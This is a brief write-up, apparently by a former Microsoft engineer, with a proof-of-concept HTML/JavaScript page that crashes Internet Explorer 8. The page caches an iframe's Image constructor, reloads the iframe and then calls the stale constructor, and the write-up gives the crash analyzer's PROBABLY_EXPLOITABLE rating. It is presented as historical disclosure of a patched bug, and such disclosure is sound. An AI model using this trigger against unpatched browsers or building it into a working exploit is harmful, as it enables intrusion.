Saving a reference to an iframe’s Image constructor, reloading the iframe (which destroys the original context), and then calling new cachedImage() from the parent crashes IE8 with a PROBABLY_EXPLOITABLE rating from the !exploitable crash analyzer.
<input type="button" onclick="crashMe()" value="Crash Me">
<iframe width="100" height="30"></iframe>
<script language="JavaScript">
function crashMe()
{
window[0].execScript("top.cachedImage = Image;location.reload();");
setTimeout("new cachedImage();", 100);
}
</script>The iframe code saves Image to top.cachedImage and reloads itself; the parent waits 100ms and then instantiates the cached constructor. The !exploitable analysis classified this as PROBABLY_EXPLOITABLE — the data from the faulting address controls code flow (hash 0x1006131a.0x61240550). On IE7 this produces an access denied rather than a crash. Tested on XP and Windows 7 with IE8.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.